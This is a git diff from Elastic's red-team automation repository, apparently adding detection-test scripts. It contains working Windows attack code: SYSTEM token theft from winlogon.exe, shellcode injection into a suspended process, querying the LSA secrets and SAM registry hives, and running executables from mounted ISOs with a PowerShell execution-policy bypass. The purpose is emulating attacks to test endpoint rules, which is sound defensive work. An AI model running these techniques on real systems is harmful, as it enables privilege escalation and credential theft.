elastic
diff --git a/‎rta/bin/ExecFromISOFile.ps1
+16 b/‎rta/bin/ExecFromISOFile.ps1
+16
diff --git a/‎rta/bin/LoadLib-Callback64.exe
124 KB b/‎rta/bin/LoadLib-Callback64.exe
124 KB
diff --git a/‎rta/bin/cmd_from_iso.iso
334 KB b/‎rta/bin/cmd_from_iso.iso
334 KB
diff --git a/‎rta/bin/faultrep.dll
58 KB b/‎rta/bin/faultrep.dll
58 KB
diff --git a/‎rta/bin/lnk_from_iso_rundll.iso
110 KB b/‎rta/bin/lnk_from_iso_rundll.iso
110 KB
diff --git a/‎rta/bin/ping_dns_from_iso.iso
72 KB b/‎rta/bin/ping_dns_from_iso.iso
72 KB
diff --git a/‎rta/bin/rta_unhook_ldrload.exe
63 KB b/‎rta/bin/rta_unhook_ldrload.exe
63 KB
diff --git a/‎rta/bin/werfault_iso.iso
666 KB b/‎rta/bin/werfault_iso.iso
666 KB
diff --git a/‎rta/c2_dns_from_iso.py
+44 b/‎rta/c2_dns_from_iso.py
+44
diff --git a/‎rta/common.py
+141 b/‎rta/common.py
+141
diff --git a/‎rta/credaccess_reg_query_privesc_token_manip.py
+133 b/‎rta/credaccess_reg_query_privesc_token_manip.py
+133
@@ -0,0 +1,16 @@
+function ExecFromISO {
+	[CmdletBinding()]
+	param(
+		[Parameter()]
+		[string] $ISOFile,
+		[string] $procname,
+		[string] $cmdline
+	)
+	$MountMeta = Mount-DiskImage -ImagePath $ISOFile -StorageType ISO -Access ReadOnly
+	$DriveLetter = ($MountMeta | Get-Volume).DriveLetter
+	if ($cmdline) {Start-Process -FilePath "$($DriveLetter):\$($procname)" -ArgumentList "$($cmdline)";}
+	else {Start-Process -FilePath  "$($DriveLetter):\$($procname)" -WorkingDirectory "$($DriveLetter):\"} 
+	Start-Sleep -s 2
+	Stop-process -name $procname -Force -ErrorAction ignore
+	Dismount-DiskImage -ImagePath $ISOFile | Out-Null
+}
@@ -0,0 +1,44 @@
+# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+# or more contributor license agreements. Licensed under the Elastic License
+# 2.0; you may not use this file except in compliance with the Elastic License
+# 2.0.
+
+from . import common
+from . import RtaMetadata
+import os
+
+metadata = RtaMetadata(
+    uuid="ba802fb2-f183-420e-947m-da5ce0235d123",
+    platforms=["windows"],
+    siem=[],
+    endpoint=[{"rule_id": "3bc98de7-3349-43ac-869c-58357ae2aac0", "rule_name": "Suspicious DNS Query from Mounted Virtual Disk"}, 
+              {"rule_id": "88f6c3d4-112e-4fad-b3ef-33095c954b63", "rule_name": "Suspicious DNS Query to Free SSL Certificate Domains"}, 
+              {"rule_id": "d37ffe39-8e58-460f-938d-3bafbae60711", "rule_name": "DNS Query to Suspicious Top Level Domain"}],
+    techniques=["T1071", "T1204", "T1071.004"],
+)
+
+# iso contains ping.exe to test for rules looking for suspicious DNS queries from mounted ISO file
+ISO = common.get_path("bin", "ping_dns_from_iso.iso")
+PROC = 'ping.exe'
+
+# ps script to mount, execute a file and unmount ISO device
+PS_SCRIPT = common.get_path("bin", "ExecFromISOFile.ps1")
+
+@common.requires_os(metadata.platforms)
+
+def main():
+    if os.path.exists(ISO) and os.path.exists(PS_SCRIPT):
+        print(f'[+] - ISO File {ISO} will be mounted and executed via powershell')
+
+        # 3 unique domains to trigger 3 unique rules looking for dns events via a process running from a mounted ISO file
+        for domain in ["Abc.xyz", "content.dropboxapi.com", "x1.c.lencr.org"] :
+
+            # import ExecFromISO function that takes two args -ISOFIle pointing to ISO file path and -procname pointing to the filename to execute and -cmdline for arguments
+            # command = "powershell.exe -ExecutionPol Bypass -c import-module " + psf + '; ExecFromISO -ISOFile ' + ISO + ' -procname '+ PROC + ' -cmdline ' + domain + ';'
+            command = f"powershell.exe -ExecutionPol Bypass -c import-module {PS_SCRIPT}; ExecFromISO -ISOFile {ISO} -procname {PROC} -cmdline {domain};"
+            common.execute(command)
+
+        print(f'[+] - RTA Done!')
+
+if __name__ == "__main__":
+    exit(main())
@@ -24,6 +24,8 @@
 from typing import Iterable, Optional, Union
 
 
+
+    
 from http.server import HTTPServer, SimpleHTTPRequestHandler
 
 long_t = type(1 << 63)
@@ -67,6 +69,60 @@ def get_winreg():
 if CURRENT_OS == WINDOWS:
     CMD_PATH = os.environ.get("COMSPEC")
     POWERSHELL_PATH = "C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
+    import ctypes
+    import win32process
+    import win32file
+    import win32service
+    import win32api, win32security
+    from ctypes import byref, windll, wintypes
+    from ctypes.wintypes import BOOL
+    from ctypes.wintypes import DWORD
+    from ctypes.wintypes import HANDLE
+    from ctypes.wintypes import LPVOID
+    from ctypes.wintypes import LPCVOID
+    # Windows related constants and classes
+    TH32CS_SNAPPROCESS = 0x00000002
+    PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
+    TOKEN_DUPLICATE = 0x0002
+    TOKEN_ALL_ACCESS = 0xf00ff
+    MAX_PATH = 260
+    BOOL = ctypes.c_int
+    DWORD = ctypes.c_uint32
+    HANDLE = ctypes.c_void_p
+    LONG = ctypes.c_int32
+    NULL_T = ctypes.c_void_p
+    SIZE_T = ctypes.c_uint
+    TCHAR = ctypes.c_char
+    USHORT = ctypes.c_uint16
+    UCHAR = ctypes.c_ubyte
+    ULONG = ctypes.c_uint32
+
+    class PROCESSENTRY32(ctypes.Structure):
+        _fields_ = [
+            ('dwSize', DWORD),
+            ('cntUsage', DWORD),
+            ('th32ProcessID', DWORD),
+            ('th32DefaultHeapID', NULL_T),
+            ('th32ModuleID', DWORD),
+            ('cntThreads', DWORD),
+            ('th32ParentProcessID', DWORD),
+            ('pcPriClassBase', LONG),
+            ('dwFlags', DWORD),
+            ('szExeFile', TCHAR * MAX_PATH)
+        ]
+
+    LPCSTR = LPCTSTR = ctypes.c_char_p
+    LPDWORD = PDWORD = ctypes.POINTER(DWORD)
+
+    class _SECURITY_ATTRIBUTES(ctypes.Structure):
+        _fields_ = [('nLength', DWORD),
+                    ('lpSecurityDescriptor', LPVOID),
+                    ('bInheritHandle', BOOL), ]
+
+    SECURITY_ATTRIBUTES = _SECURITY_ATTRIBUTES
+    LPSECURITY_ATTRIBUTES = ctypes.POINTER(_SECURITY_ATTRIBUTES)
+    LPTHREAD_START_ROUTINE = LPVOID
+
 else:
     CMD_PATH = "/bin/sh"
     POWERSHELL_PATH = None
@@ -669,3 +725,88 @@ def print_file(path):
             print(f.read().rstrip())
 
     print("")
+
+
+# return pid by process.name
+@requires_os('windows')
+def getppid(pname):
+    CreateToolhelp32Snapshot = ctypes.windll.kernel32.CreateToolhelp32Snapshot 
+    Process32First = ctypes.windll.kernel32.Process32First  
+    Process32Next = ctypes.windll.kernel32.Process32Next 
+    CloseHandle = ctypes.windll.kernel32.CloseHandle 
+
+    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0) 
+    pe32 = PROCESSENTRY32() 
+    pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
+    current_pid = os.getpid()
+
+
+    if Process32First(hProcessSnap, ctypes.byref(pe32)) == 0:
+     print(f"[x] - Failed getting first process.")
+     return
+
+    while True:
+        procname = pe32.szExeFile.decode("utf-8").lower()
+        if pname.lower() in procname:
+            CloseHandle(hProcessSnap)
+            return pe32.th32ProcessID
+        if not Process32Next(hProcessSnap, ctypes.byref(pe32)):
+            CloseHandle(hProcessSnap)
+            return None
+
+@requires_os('windows')
+def impersonate_system(): 
+     try: 
+        hp = win32api.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, 0, getppid("winlogon.exe"))
+        th = win32security.OpenProcessToken(hp, TOKEN_DUPLICATE)
+        new_tokenh = win32security.DuplicateTokenEx(th, 2, TOKEN_ALL_ACCESS , win32security.TokenImpersonation , win32security.SECURITY_ATTRIBUTES())
+        win32security.ImpersonateLoggedOnUser(new_tokenh)
+        print(f"[+] - Impersonated System Token via Winlogon")
+        win32api.CloseHandle(hp)
+     except Exception as e:
+            print(f"[x] - Failed To Impersonate System Token via Winlogon")
+            
+@requires_os('windows')
+def Inject(path, shellcode):
+    import ctypes, time
+    import ctypes.wintypes
+
+    from ctypes.wintypes import BOOL
+    from ctypes.wintypes import DWORD
+    from ctypes.wintypes import HANDLE
+    from ctypes.wintypes import LPVOID
+    from ctypes.wintypes import LPCVOID
+    import win32process
+    # created suspended process
+    info = win32process.CreateProcess(None, path, None, None, False, 0x04, None, None, win32process.STARTUPINFO())
+    page_rwx_value = 0x40
+    process_all = 0x1F0FFF
+    memcommit = 0x00001000
+
+    if info[0].handle > 0 :
+       print(f"[+] - Created {path} Suspended")
+    shellcode_length = len(shellcode)
+    process_handle = info[0].handle  # phandle
+    VirtualAllocEx = windll.kernel32.VirtualAllocEx
+    VirtualAllocEx.restype = LPVOID
+    VirtualAllocEx.argtypes = (HANDLE, LPVOID, DWORD, DWORD, DWORD)
+
+    WriteProcessMemory = ctypes.windll.kernel32.WriteProcessMemory
+    WriteProcessMemory.restype = BOOL
+    WriteProcessMemory.argtypes = (HANDLE, LPVOID, LPCVOID, DWORD, DWORD)
+    CreateRemoteThread = ctypes.windll.kernel32.CreateRemoteThread
+    CreateRemoteThread.restype = HANDLE
+    CreateRemoteThread.argtypes = (HANDLE, LPSECURITY_ATTRIBUTES, DWORD, LPTHREAD_START_ROUTINE, LPVOID, DWORD, DWORD)
+
+    # allocate RWX memory
+    lpBuffer = VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value)
+    print(f'[+] - Allocated remote memory at {hex(lpBuffer)}')
+
+    # write shellcode in allocated memory
+    res = WriteProcessMemory(process_handle, lpBuffer, shellcode, shellcode_length, 0)
+    if res > 0 :
+        print('[+] - Shellcode written.')
+
+    # create remote thread to start shellcode execution
+    CreateRemoteThread(process_handle, None, 0, lpBuffer, 0, 0, 0)
+    print('[+] - Shellcode Injection, done.')
@@ -0,0 +1,133 @@
+# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+# or more contributor license agreements. Licensed under the Elastic License
+# 2.0; you may not use this file except in compliance with the Elastic License
+# 2.0.
+
+from . import common
+from . import RtaMetadata
+
+
+
+metadata = RtaMetadata(
+    uuid="59329aa6-852a-44d0-9b24-322fe4fbdad0",
+    platforms=["windows"],
+    endpoint=[
+    {'rule_id': 'c5ee8453-bc89-42e7-a414-1ba4bec85119', 'rule_name': 'Suspicious Access to LSA Secrets Registry'}, 
+    {'rule.id': 'b6e8c090-f0ec-4c4c-af00-55ac2a9f9b41', 'rule_name': 'Security Account Manager (SAM) Registry Access'},
+    {'rule.id': '2afd9e7f-99e0-4a4d-a6e3-9e9db730f63b', 'rule_name': 'Privilege Escalation via EXTENDED STARTUPINFO'},
+    {'rule.id': '46de65b8-b873-4ae7-988d-12dcdc6fa605', 'rule_name': 'Potential Privilege Escalation via Token Impersonation'},
+    ],
+    siem=[],
+    techniques=["T1134", "T1003"],
+)
+
+@common.requires_os(metadata.platforms)
+def main():
+    import ctypes
+    from ctypes import byref, windll, wintypes
+
+    hprocess = wintypes.HANDLE()
+    hsystem_token = wintypes.HANDLE()
+    hsystem_token_dup = wintypes.HANDLE()
+
+    PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
+    TOKEN_IMPERSONATE = 0x00000004
+    TOKEN_DUPLICATE = 0x00000002
+    SecurityImpersonation = 0x2
+    TokenPrimary = 0x1
+    LOGON_WITH_PROFILE = 0x1
+    TOKEN_ALL_ACCESS = 0xf01ff
+    LPBYTE = ctypes.POINTER(wintypes.BYTE)
+
+    class PROCESS_INFORMATION(ctypes.Structure):
+        _pack_ = 1
+        _fields_ = [
+            ('hProcess', wintypes.HANDLE),
+            ('hThread', wintypes.HANDLE),
+            ('dwProcessId', wintypes.DWORD),
+            ('dwThreadId', wintypes.DWORD),
+        ]
+
+    class STARTUPINFO(ctypes.Structure):
+        __slots__ = ()
+        _fields_ = (('cb', wintypes.DWORD),
+                    ('lpReserved', wintypes.LPWSTR),
+                    ('lpDesktop', wintypes.LPWSTR),
+                    ('lpTitle', wintypes.LPWSTR),
+                    ('dwX', wintypes.DWORD),
+                    ('dwY', wintypes.DWORD),
+                    ('dwXSize', wintypes.DWORD),
+                    ('dwYSize', wintypes.DWORD),
+                    ('dwXCountChars', wintypes.DWORD),
+                    ('dwYCountChars', wintypes.DWORD),
+                    ('dwFillAttribute', wintypes.DWORD),
+                    ('dwFlags', wintypes.DWORD),
+                    ('wShowWindow', wintypes.WORD),
+                    ('cbReserved2', wintypes.WORD),
+                    ('lpReserved2', LPBYTE),
+                    ('hStdInput', wintypes.HANDLE),
+                    ('hStdOutput', wintypes.HANDLE),
+                    ('hStdError', wintypes.HANDLE))
+
+    OpenProcess = windll.kernel32.OpenProcess
+    OpenProcess.argtypes = [wintypes.DWORD, wintypes.BOOL, wintypes.DWORD]
+    OpenProcess.restype = wintypes.HANDLE
+
+    OpenProcessToken = windll.kernel32.OpenProcessToken
+    OpenProcessToken.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.LPCVOID]
+    OpenProcessToken.restype = wintypes.BOOL
+
+    DuplicateTokenEx = windll.advapi32.DuplicateTokenEx
+    DuplicateTokenEx.restype = wintypes.BOOL
+    DuplicateTokenEx.argtypes = [
+        wintypes.HANDLE,                 # TokenHandle
+        wintypes.DWORD,                  # dwDesiredAccess
+        wintypes.LPCVOID,                # lpTokenAttributes
+        wintypes.DWORD,                  # ImpersonationLevel
+        wintypes.DWORD,                  # TokenType
+        wintypes.HANDLE,                 # phNewToken
+    ]
+
+    CreateProcessWithTokenW = windll.advapi32.CreateProcessWithTokenW
+    CreateProcessWithTokenW.argtypes = [
+        wintypes.HANDLE,  # hToken
+        wintypes.DWORD,  # dwLogonFlags
+        wintypes.LPCWSTR,  # lpApplicationName
+        wintypes.LPCVOID,  # lpCommandLine
+        wintypes.DWORD,  # dwCreationFlags
+        wintypes.LPCVOID,  # lpEnvironment
+        wintypes.LPCVOID,  # lpCurrentDirectory
+        wintypes.LPCVOID,  # lpStartupInfo
+        wintypes.LPCVOID,  # lpProcessInformation
+    ]
+    CreateProcessWithTokenW.restype = wintypes.BOOL
+
+    CloseHandle = windll.kernel32.CloseHandle
+    CloseHandle.argtypes = [wintypes.HANDLE]
+    CloseHandle.restype = wintypes.BOOL 
+    
+    # Duplicate winlogon.exe System Token 
+    hprocess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, 0, common.getppid("winlogon.exe")) 
+    OpenProcessToken(hprocess, TOKEN_DUPLICATE | TOKEN_IMPERSONATE, byref(hsystem_token)) 
+    DuplicateTokenEx(hsystem_token, TOKEN_ALL_ACCESS, 0, SecurityImpersonation, TokenPrimary, byref(hsystem_token_dup)) 
+    
+    # create process with winlogon system token duplicate to query specific sensitive registry keys using reg.exe 
+    process_info = PROCESS_INFORMATION() 
+    startup_info = STARTUPINFO() 
+    cmdline = u" /c reg.exe query hklm\\security\\policy\\secrets && reg.exe query hklm\\SAM\\SAM\\Domains\\Account && reg.exe query hklm\\SYSTEM\\ControlSet001\\Control\\Lsa\\JD && reg.exe query hklm\\SYSTEM\\ControlSet001\\Control\\Lsa\\Skew1"
+    res = CreateProcessWithTokenW(hsystem_token_dup, LOGON_WITH_PROFILE, u"C:\\Windows\\System32\\cmd.exe", cmdline, 0, 0, 0, byref(startup_info), byref (process_info)) 
+    
+    # check process creation result
+    if res == 1 :
+       common.log("Executed RTA")
+    else : 
+       common.log("Failed to execute RTA")
+       
+    # Close all the handles 
+    common.log("Closed all Handles") 
+    CloseHandle(hsystem_token_dup) 
+    CloseHandle(hsystem_token) 
+    CloseHandle(hprocess)
+
+if __name__ == "__main__":
+    exit(main())